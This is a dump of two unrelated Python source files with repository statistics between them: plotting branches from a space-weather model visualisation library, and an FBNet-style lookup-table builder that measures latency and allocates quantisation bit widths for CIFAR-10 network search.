@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,z=h)
def pfunc(time, x, y, z):
return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
plot_kamodo['XY'] = pfunc
return plot_kamodo.plot(XY=dict(x=lon,y=lat))
elif plottype=='XZ':
arg_units = {coord_list[1]:xvec[coord_list[1]],
coord_list[3]:xvec[coord_list[3]]} #e.g. {'x':'R_E','z':'R_E'}
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,y=lat)
def pfunc(time, x, y, z):
return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
plot_kamodo['XZ'] = pfunc
return plot_kamodo.plot(XZ=dict(x=lon,z=h))
elif plottype=='YZ':
arg_units = {coord_list[2]:xvec[coord_list[2]],
coord_list[3]:xvec[coord_list[3]]} #e.g. {'y':'R_E','z':'R_E'}
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,x=lon)
def pfunc(time, x, y, z):
return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
plot_kamodo['YZ'] = pfunc
return plot_kamodo.plot(YZ=dict(y=lat,z=h))
else: #logic for plotting with not gridified function-----------------------------------------------------
#LonLat plots
if plottype=='LonLat':
arg_units = {coord_list[1]:xvec[coord_list[1]],
coord_list[2]:xvec[coord_list[2]]} #{'lon':'deg','lat':'deg'}
#accounting for differing vertical dependencies
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,height=h)
def pfunc(time, lon, lat, height):
data = grid4D(kamodo_object, varname, time, lon, lat, height)
return reshape(data,(lon.shape[0],lat.shape[0]))
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,radius=h)
def pfunc(time, lon, lat, radius):
data = grid4D(kamodo_object, varname, time, lon, lat, radius)
return reshape(data,(lon.shape[0],lat.shape[0]))
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,ilev=h)
def pfunc(time, lon, lat, ilev):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
return reshape(data,(lon.shape[0],lat.shape[0]))
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,ilev1=h)
def pfunc(time, lon, lat, ilev1):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
return reshape(data,(lon.shape[0],lat.shape[0]))
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,milev=h)
def pfunc(time, mlon, mlat, milev):
data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
return reshape(data,(mlon.shape[0],mlat.shape[0]))
plot_kamodo['LonLat'] = pfunc
return plot_kamodo.plot(LonLat=dict(mlat=lat,mlon=lon))
elif vert=='none':
if coord_list[1]=='Elon':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t)
def pfunc(time, Elon, Elat):
data = grid3D(kamodo_object, varname, time, Elon, Elat)
return reshape(data,(Elon.shape[0],Elat.shape[0]))
plot_kamodo['LonLat'] = pfunc
return plot_kamodo.plot(LonLat=dict(Elat=lat,Elon=lon))
else:
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t)
def pfunc(time, lon, lat):
data = grid3D(kamodo_object, varname, time, lon, lat)
return reshape(data,(lon.shape[0],lat.shape[0]))
plot_kamodo['LonLat'] = pfunc
return plot_kamodo.plot(LonLat=dict(lat=lat,lon=lon))
#TimeLon plots #####reshape command has reverse order b/c plots looked wrong for CTIPe
elif plottype=='TimeLon':
arg_units={'time':'hr',coord_list[1]:xvec[coord_list[1]]} #'lon':'deg'
#accounting for differing vertical dependencies
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat,height=h)
def pfunc(time, lon, lat, height):
data = grid4D(kamodo_object, varname, time, lon, lat, height)
return reshape(data,(lon.shape[0],time.shape[0])).T
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat,radius=h)
def pfunc(time, lon, lat, radius):
data = grid4D(kamodo_object, varname, time, lon, lat, radius)
return reshape(data,(lon.shape[0],time.shape[0])).T
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat,ilev=h)
def pfunc(time, lon, lat, ilev):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
return reshape(data,(lon.shape[0],time.shape[0])).T
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat,ilev1=h)
def pfunc(time, lon, lat, ilev1):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
return reshape(data,(lon.shape[0],time.shape[0])).T
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(mlat=lat,milev=h)
def pfunc(time, mlon, mlat, milev):
data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
return reshape(data,(mlon.shape[0],time.shape[0])).T
plot_kamodo['TimeLon'] = pfunc
return plot_kamodo.plot(TimeLon=dict(time=t,mlon=lon))
elif vert=='none':
if coord_list[1]=='Elon':
@kamodofy(units=units, arg_units=arg_units)
@partial(Elat=lat)
def pfunc(time, Elon, Elat):
data = grid3D(kamodo_object, varname, time, Elon, Elat)
return reshape(data,(Elon.shape[0],time.shape[0]))
plot_kamodo['TimeLon'] = pfunc
return plot_kamodo.plot(TimeLon=dict(time=t,Elon=lon))
else:
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat)
def pfunc(time, lon, lat):
data = grid3D(kamodo_object, varname, time, lon, lat)
return reshape(data,(lon.shape[0],time.shape[0]))
plot_kamodo['TimeLon'] = pfunc
return plot_kamodo.plot(TimeLon=dict(time=t,lon=lon))
#TimeLat plots
elif plottype=='TimeLat':
arg_units={'time':'hr',coord_list[2]:xvec[coord_list[2]]} #'lat':'deg'
#accounting for differing vertical dependencies
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,height=h)
def pfunc(time, lon, lat, height):
data = grid4D(kamodo_object, varname, time, lon, lat, height)
return reshape(data,(time.shape[0],lat.shape[0]))
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,radius=h)
def pfunc(time, lon, lat, radius):
data = grid4D(kamodo_object, varname, time, lon, lat, radius)
return reshape(data,(time.shape[0],lat.shape[0]))
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,ilev=h)
def pfunc(time, lon, lat, ilev):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
return reshape(data,(time.shape[0],lat.shape[0]))
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,ilev1=h)
def pfunc(time, lon, lat, ilev1):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
return reshape(data,(time.shape[0],lat.shape[0]))
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(mlon=lon,milev=h)
def pfunc(time, mlon, mlat, milev):
data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
return reshape(data,(time.shape[0],mlat.shape[0]))
plot_kamodo['TimeLat'] = pfunc
return plot_kamodo.plot(TimeLat=dict(time=t,mlat=lat))
elif vert=='none':
if coord_list[1]=='Elon':
@kamodofy(units=units, arg_units=arg_units)
@partial(Elon=lon)
def pfunc(time, Elon, Elat):
data = grid3D(kamodo_object, varname, time, Elon, Elat)
return reshape(data,(time.shape[0],Elat.shape[0]))
plot_kamodo['TimeLat'] = pfunc
return plot_kamodo.plot(TimeLat=dict(time=t,Elat=lat))
else:
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon)
def pfunc(time, lon, lat):
data = grid3D(kamodo_object, varname, time, lon, lat)
return reshape(data,(time.shape[0],lat.shape[0]))
plot_kamodo['TimeLat'] = pfunc
return plot_kamodo.plot(TimeLat=dict(time=t,lat=lat))
#TimeH plots
elif plottype=='TimeH':
#accounting for differing vertical dependencies
arg_units = {'time':'hr',coord_list[-1]:xvec[coord_list[-1]]} #'time':'hr', 'height':'km'
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,lat=lat)
def pfunc(time, lon, lat, height):
data = grid4D(kamodo_object, varname, time, lon, lat, height)
return reshape(data,(time.shape[0],height.shape[0]))
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,height=h))
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,lat=lat)
def pfunc(time, lon, lat, radius):
data = grid4D(kamodo_object, varname, time, lon, lat, radius)
return reshape(data,(time.shape[0],radius.shape[0]))
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,radius=h))
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,lat=lat)
def pfunc(time, lon, lat, ilev):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
return reshape(data,(time.shape[0],ilev.shape[0]))
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,ilev=h))
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,lat=lat)
def pfunc(time, lon, lat, ilev1):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
return reshape(data,(time.shape[0],ilev1.shape[0]))
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,ilev1=h))
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(mlon=lon,mlat=lat)
def pfunc(time, mlon, mlat, milev):
data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
return reshape(data,(time.shape[0],milev.shape[0]))
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,milev=h))
elif vert=='none':
raise AttributeError('Variable does not depend on height.')
#LonH plots
elif plottype=='LonH':
#accounting for differing vertical dependencies
arg_units = {coord_list[1]:xvec[coord_list[1]],
coord_list[-1]:xvec[coord_list[-1]]} #'lon':'deg', 'height':'km'
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lat=lat)
def pfunc(time, lon, lat, height):
data = grid4D(kamodo_object, varname, time, lon, lat, height)
return reshape(data,(lon.shape[0],height.shape[0]))
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(lon=lon,height=h))
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lat=lat)
def pfunc(time, lon, lat, radius):
data = grid4D(kamodo_object, varname, time, lon, lat, radius)
return reshape(data,(lon.shape[0],radius.shape[0]))
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(lon=lon,radius=h))
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lat=lat)
def pfunc(time, lon, lat, ilev):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
return reshape(data,(lon.shape[0],ilev.shape[0]))
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(lon=lon,ilev=h))
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lat=lat)
def pfunc(time, lon, lat, ilev1):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
return reshape(data,(lon.shape[0],ilev1.shape[0]))
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(lon=lon,ilev1=h))
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,mlat=lat)
def pfunc(time, mlon, mlat, milev):
data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
return reshape(data,(mlon.shape[0],milev.shape[0]))
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(mlon=lon,milev=h))
elif vert=='none':
raise AttributeError('Variable does not depend on height.')
#LatH plots
elif plottype=='LatH':
#accounting for differing vertical dependencies
arg_units = {coord_list[2]:xvec[coord_list[2]],
coord_list[-1]:xvec[coord_list[-1]]} #'lat':'deg', 'height':'km'
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lon=lon)
def pfunc(time, lon, lat, height):
data = grid4D(kamodo_object, varname, time, lon, lat, height)
return reshape(data,(lat.shape[0],height.shape[0]))
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(lat=lat,height=h))
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lon=lon)
def pfunc(time, lon, lat, radius):
data = grid4D(kamodo_object, varname, time, lon, lat, radius)
return reshape(data,(lat.shape[0],radius.shape[0]))
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(lat=lat,radius=h))
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lon=lon)
def pfunc(time, lon, lat, ilev):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
return reshape(data,(lat.shape[0],ilev.shape[0]))
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(lat=lat,ilev=h))
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lon=lon)
def pfunc(time, lon, lat, ilev1):
data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
return reshape(data,(lat.shape[0],ilev1.shape[0]))
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(lat=lat,ilev1=h))
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,mlon=lon)
def pfunc(time, mlon, mlat, milev):
data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
return reshape(data,(mlat.shape[0],milev.shape[0]))
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(mlat=lat,milev=h))
elif vert=='none':
raise AttributeError('Variable does not depend on height.')
#cartesian plots
elif plottype=='TimeX':
arg_units={'time':'hr',coord_list[1]:xvec[coord_list[1]]} #'X':'R_E'
@kamodofy(units=units, arg_units=arg_units)
@partial(y=lat,z=h)
def pfunc(time, x, y, z):
data = grid4D(kamodo_object, varname, time, x, y, z)
return reshape(data,(x.shape[0],time.shape[0])).T
plot_kamodo['TimeX'] = pfunc
return plot_kamodo.plot(TimeX=dict(time=t,x=lon))
elif plottype=='TimeY':
arg_units={'time':'hr',coord_list[2]:xvec[coord_list[2]]} #'X':'R_E'
@kamodofy(units=units, arg_units=arg_units)
@partial(x=lon,z=h)
def pfunc(time, x, y, z):
data = grid4D(kamodo_object, varname, time, x, y, z)
return reshape(data,(time.shape[0],y.shape[0]))
plot_kamodo['TimeY'] = pfunc
return plot_kamodo.plot(TimeY=dict(time=t,y=lat))
elif plottype=='TimeZ':
arg_units={'time':'hr',coord_list[3]:xvec[coord_list[3]]} #'X':'R_E'
@kamodofy(units=units, arg_units=arg_units)
@partial(x=lon,y=lat)
def pfunc(time, x, y, z):
data = grid4D(kamodo_object, varname, time, x, y, z)
return reshape(data,(time.shape[0],z.shape[0]))
plot_kamodo['TimeZ'] = pfunc
return plot_kamodo.plot(TimeZ=dict(time=t,z=h))
elif plottype=='XY':
arg_units = {coord_list[1]:xvec[coord_list[1]],
coord_list[2]:xvec[coord_list[2]]} #e.g. {'x':'R_E','y':'R_E'}
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,z=h)
def pfunc(time, x, y, z):
data = grid4D(kamodo_object, varname, time, x, y, z)
return reshape(data,(x.shape[0],y.shape[0]))
plot_kamodo['XY'] = pfunc
return plot_kamodo.plot(XY=dict(x=lon,y=lat))
elif plottype=='XZ':
arg_units = {coord_list[1]:xvec[coord_list[1]],
coord_list[3]:xvec[coord_list[3]]} #e.g. {'x':'R_E','z':'R_E'}
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,y=lat)
def pfunc(time, x, y, z):
data = grid4D(kamodo_object, varname, time, x, y, z)
return reshape(data,(x.shape[0],z.shape[0]))
plot_kamodo['XZ'] = pfunc
return plot_kamodo.plot(XZ=dict(x=lon,z=h))
elif plottype=='YZ':
arg_units = {coord_list[2]:xvec[coord_list[2]],
coord_list[3]:xvec[coord_list[3]]} #e.g. {'y':'R_E','z':'R_E'}
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,x=lon)
def pfunc(time, x, y, z):
data = grid4D(kamodo_object, varname, time, x, y, z)
return reshape(data,(y.shape[0],z.shape[0]))
plot_kamodo['YZ'] = pfunc
return plot_kamodo.plot(YZ=dict(y=lat,z=h))
| 54.92142
| 112
| 0.521219
| 5,163
| 43,333
| 4.270579
| 0.04203
| 0.069663
| 0.099052
| 0.089709
| 0.900404
| 0.894009
| 0.890834
| 0.880448
| 0.872194
| 0.871468
| 0
| 0.012012
| 0.352549
| 43,333
| 788
| 113
| 54.991117
| 0.773881
| 0.067777
| 0
| 0.889362
| 0
| 0
| 0.037934
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.124823
| false
| 0
| 0.002837
| 0.059574
| 0.337589
| 0.001418
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa59e1ac4e63002096e03bd412ca6f11c732b9a9
| 191
|
py
|
Python
|
checkout_sdk/vaults/__init__.py
|
checkout/checkout-sdk-python
|
908d25c2904508fb0130e186d7d5de2ad116f0c3
|
[
"MIT"
] | 13
|
2018-08-29T09:09:11.000Z
|
2021-11-26T08:30:58.000Z
|
checkout_sdk/vaults/__init__.py
|
checkout/checkout-sdk-python
|
908d25c2904508fb0130e186d7d5de2ad116f0c3
|
[
"MIT"
] | 17
|
2018-08-30T07:39:15.000Z
|
2022-03-31T16:09:38.000Z
|
checkout_sdk/vaults/__init__.py
|
checkout/checkout-sdk-python
|
908d25c2904508fb0130e186d7d5de2ad116f0c3
|
[
"MIT"
] | 13
|
2018-09-11T13:00:55.000Z
|
2021-05-19T15:19:30.000Z
|
from checkout_sdk.vaults.exchange_client import ExchangeClient
from checkout_sdk.vaults.tokens_client import TokensClient
from checkout_sdk.vaults.instruments_client import InstrumentsClient
| 47.75
| 68
| 0.905759
| 24
| 191
| 6.958333
| 0.5
| 0.215569
| 0.269461
| 0.377246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062827
| 191
| 3
| 69
| 63.666667
| 0.932961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
aa60cb6ec06dcc6ed5892a2a01d4c8b1243c3f7e
| 18,678
|
py
|
Python
|
quantization/cifar10/supernet_functions/lookup_table_builder.py
|
sunghern/Auto-Compression
|
7c1123e5ffb63b0c34bef2db40dbfb560cb25c2e
|
[
"MIT"
] | 11
|
2019-11-26T04:33:31.000Z
|
2022-03-28T11:35:54.000Z
|
quantization/cifar10/supernet_functions/lookup_table_builder.py
|
sunghern/Auto-Compression
|
7c1123e5ffb63b0c34bef2db40dbfb560cb25c2e
|
[
"MIT"
] | 22
|
2019-11-26T06:48:07.000Z
|
2021-12-20T12:50:16.000Z
|
quantization/cifar10/supernet_functions/lookup_table_builder.py
|
sunghern/Auto-Compression
|
7c1123e5ffb63b0c34bef2db40dbfb560cb25c2e
|
[
"MIT"
] | 10
|
2019-11-26T04:33:57.000Z
|
2021-10-12T04:30:48.000Z
|
import timeit
import torch
from collections import OrderedDict
import gc
from fbnet_building_blocks.fbnet_builder import PRIMITIVES
from general_functions.utils import add_text_to_file, clear_files_in_the_list
from supernet_functions.config_for_supernet import CONFIG_SUPERNET
import numpy as np
import sys
import math
import copy
np.set_printoptions(threshold=sys.maxsize)
# the settings from the page 4 of https://arxiv.org/pdf/1812.03443.pdf
#### table 2
#CANDIDATE_BLOCKS = ["ir_k3_e1", "ir_k3_s2", "ir_k3_e3",
# "ir_k3_e6", "ir_k5_e1", "ir_k5_s2",
# "ir_k5_e3", "ir_k5_e6", "skip"]
CANDIDATE_HIGH = ["A2_W1", "A3_W1", "A4_W1",
"A2_W2", "A3_W2", "A4_W2"]
CANDIDATE_BLOCKS = ["quant_a1_w1", "quant_a2_w2", "quant_a3_w3"]
SEARCH_SPACE = OrderedDict([
#### table 1. input shapes of 22 searched layers (considering with strides)
# Note: the second and third dimentions are recommended (will not be used in training) and written just for debagging
("input_shape", [(3, 32, 32),
(128, 32, 32), (128, 16, 16), (256, 16, 16), (256, 8, 8),
(512, 8, 8), (512, 4, 4)]),
# table 1. filter numbers over the 22 layers
("channel_size", [128,
128, 256, 256, 512, 512, 1024]),
# table 1. strides over the 22 layers
("strides", [1,
1, 1, 1, 1, 1,
1]),
("padding", [1, 1, 1, 1, 1, 1, 0]),
("Maxpool", [0, 1, 0, 1, 0, 1, 1]),
("Activation", [3, 3, 3, 3, 3, 3, 3]),
("Weight", [7, 4, 3, 4, 3, 3, 3])
])
class LookUpTable_HIGH:
def __init__(self, candidate_blocks=CANDIDATE_HIGH, search_space=SEARCH_SPACE,
calulate_latency=False):
self.cnt_layers = len(search_space["input_shape"])
self.search_space=SEARCH_SPACE
self.candidate=CANDIDATE_HIGH
# constructors for each operation
self.lookup_table_operations = {op_name : PRIMITIVES[op_name] for op_name in candidate_blocks}
# arguments for the ops constructors. one set of arguments for all 9 constructors at each layer
# input_shapes just for convinience
self.layers_parameters, self.layers_input_shapes = self._generate_layers_parameters(search_space)
# lookup_table
self.lookup_table_latency = None
if calulate_latency:
self._create_from_operations(cnt_of_runs=CONFIG_SUPERNET['lookup_table']['number_of_runs'],
write_to_file=CONFIG_SUPERNET['lookup_table']['path_to_lookup_table_high'])
else:
self._create_from_file(path_to_file=CONFIG_SUPERNET['lookup_table']['path_to_lookup_table_high'])
def _generate_layers_parameters(self, search_space):
# layers_parameters are : C_in, C_out, expansion, stride
layers_parameters = [((search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
None),
(search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
None),
(search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
None),
(search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
None),
(search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
None),
(search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
None),
) for layer_id in range(self.cnt_layers)]
# layers_input_shapes are (C_in, input_w, input_h)
layers_input_shapes = search_space["input_shape"]
return layers_parameters, layers_input_shapes
# CNT_OP_RUNS us number of times to check latency (we will take average)
def _create_from_operations(self, cnt_of_runs, write_to_file=None):
self.lookup_table_latency = self._calculate_latency(self.lookup_table_operations,
self.layers_parameters,
self.layers_input_shapes,
cnt_of_runs)
if write_to_file is not None:
self._write_lookup_table_to_file(write_to_file)
def _calculate_latency(self, operations, layers_parameters, layers_input_shapes, cnt_of_runs):
LATENCY_BATCH_SIZE = 1
latency_table_layer_by_ops = [{} for i in range(self.cnt_layers)]
for layer_id in range(self.cnt_layers):
for op_name in operations:
op = operations[op_name](*layers_parameters[layer_id])
input_sample = torch.randn((LATENCY_BATCH_SIZE, *layers_input_shapes[layer_id]))
globals()['op'], globals()['input_sample'] = op, input_sample
total_time = timeit.timeit('output = op(input_sample)', setup="gc.enable()", \
globals=globals(), number=cnt_of_runs)
# measured in micro-second
latency_table_layer_by_ops[layer_id][op_name] = total_time / cnt_of_runs / LATENCY_BATCH_SIZE * 1e6
return latency_table_layer_by_ops
def _write_lookup_table_to_file(self, path_to_file):
clear_files_in_the_list([path_to_file])
ops = [op_name for op_name in self.lookup_table_operations]
text = [op_name + " " for op_name in ops[:-1]]
text.append(ops[-1] + "\n")
for layer_id in range(self.cnt_layers):
for op_name in ops:
text.append(str(self.lookup_table_latency[layer_id][op_name]))
text.append(" ")
text[-1] = "\n"
text = text[:-1]
text = ''.join(text)
add_text_to_file(text, path_to_file)
def _create_from_file(self, path_to_file):
self.lookup_table_latency = self._read_lookup_table_from_file(path_to_file)
def _read_lookup_table_from_file(self, path_to_file):
latences = [line.strip('\n') for line in open(path_to_file)]
ops_names = latences[0].split(" ")
latences = [list(map(float, layer.split(" "))) for layer in latences[1:]]
lookup_table_latency = [{op_name : latences[i][op_id]
for op_id, op_name in enumerate(ops_names)
} for i in range(self.cnt_layers)]
return lookup_table_latency
# **** to recalculate latency use command:
# l_table = LookUpTable(calulate_latency=True, path_to_file='lookup_table.txt', cnt_of_runs=50)
# results will be written to './supernet_functions/lookup_table.txt''
# **** to read latency from the another file use command:
# l_table = LookUpTable(calulate_latency=False, path_to_file='lookup_table.txt')
class LookUpTable:
def __init__(self, candidate_blocks=CANDIDATE_BLOCKS, search_space=SEARCH_SPACE,
calulate_latency=False, count=0, act_update=[], weight_update=[]):
self.cnt_layers = len(search_space["input_shape"])
'''
global SEARCH_SPACE
SEARCH_SPACE["Activation"] = act_update
for i in range(len(search_space["Weight"])):
SEARCH_SPACE["Weight"][i] += weight_update[i]
print(SEARCH_SPACE["Activation"])
print(SEARCH_SPACE["Weight"])
'''
# constructors for each operation
self.lookup_table_operations = {op_name : PRIMITIVES[op_name] for op_name in candidate_blocks}
# arguments for the ops constructors. one set of arguments for all 9 constructors at each layer
# input_shapes just for convinience
self.count = count
self.index = []
for i in range(3):
self.index.append(self._generate_index(search_space["Weight"]))
self.layers_parameters, self.layers_input_shapes = self._generate_layers_parameters(search_space)
# lookup_table
self.lookup_table_latency = None
if calulate_latency:
self._create_from_operations(cnt_of_runs=CONFIG_SUPERNET['lookup_table']['number_of_runs'],
write_to_file=CONFIG_SUPERNET['lookup_table']['path_to_lookup_table'])
else:
self._create_from_file(path_to_file=CONFIG_SUPERNET['lookup_table']['path_to_lookup_table'])
def _generate_layers_parameters(self, search_space):
# layers_parameters are : C_in, C_out, expansion, stride
layers_parameters = [((search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
self.index[0]),
(search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
self.index[1]),
(search_space["input_shape"][layer_id][0],
search_space["channel_size"][layer_id],
search_space["Activation"][layer_id],
search_space["Weight"][layer_id],
search_space["strides"][layer_id],
search_space["padding"][layer_id],
search_space["Maxpool"][layer_id],
self.index[2]),
) for layer_id in range(self.cnt_layers)]
# layers_input_shapes are (C_in, input_w, input_h)
layers_input_shapes = search_space["input_shape"]
return layers_parameters, layers_input_shapes
def _generate_index(self, bit):
if self.count==0:
m = torch.load('/home/khs/data/sup_logs/cifar10/best-260.pth')
count = 0
index = []
for i in m.keys():
if 'weight' in i:
if count ==7:
break
index.append([])
w = m[i]
w_numpy = w.cpu().numpy()
w_numpy = w_numpy.reshape(w_numpy.shape[0], -1)
budget = bit[count] * w_numpy.shape[0]
max_val = np.max(w_numpy, axis=1)
min_val = np.min(w_numpy, axis=1)
noise = np.random.normal(0, 0.01, w_numpy.shape[0])
inter = (max_val - min_val)**2
inter = inter + noise
b = np.ones(w_numpy.shape[0])
I = inter / (3**b)
while np.sum(b) < budget:
idx = I.argmax()
b[idx] += 1
I = inter / (3**b)
for i in range(8):
index[count].append(list(np.where(b==i+1)[0]))
count+=1
else:
m = torch.load('/home/khs/data/sup_logs/cifar10/best_model.pth')
index = []
count = 0
tmp = []
for i in m.keys():
if 'thetas' in i and str(count) in i:
tmp.append(np.argmax(m[i].cpu().numpy()))
count+=1
count = 0
for i in m.keys():
if count == 7:
break
if str(count) + '.ops.' + str(tmp[count]) in i and 'weight' in i:
index.append([])
w = m[i]
w_numpy = w.cpu().numpy()
w_numpy = w_numpy.reshape(w_numpy.shape[0], -1)
budget = bit[count] * w_numpy.shape[0]
max_val = np.max(w_numpy, axis=1)
min_val = np.min(w_numpy, axis=1)
sigma = 0.01 * ((0.5)**self.count)
noise = np.random.normal(0, sigma, w_numpy.shape[0])
inter = (max_val - min_val)**2
inter = inter + noise
b = np.ones(w_numpy.shape[0])
I = inter / (3**b)
while np.sum(b) < budget:
idx = I.argmax()
b[idx] += 1
I = inter / (3**b)
for i in range(8):
index[count].append(list(np.where(b==i+1)[0]))
count+=1
return index
# CNT_OP_RUNS us number of times to check latency (we will take average)
def _create_from_operations(self, cnt_of_runs, write_to_file=None):
self.lookup_table_latency = self._calculate_latency(self.lookup_table_operations,
self.layers_parameters,
self.layers_input_shapes,
cnt_of_runs)
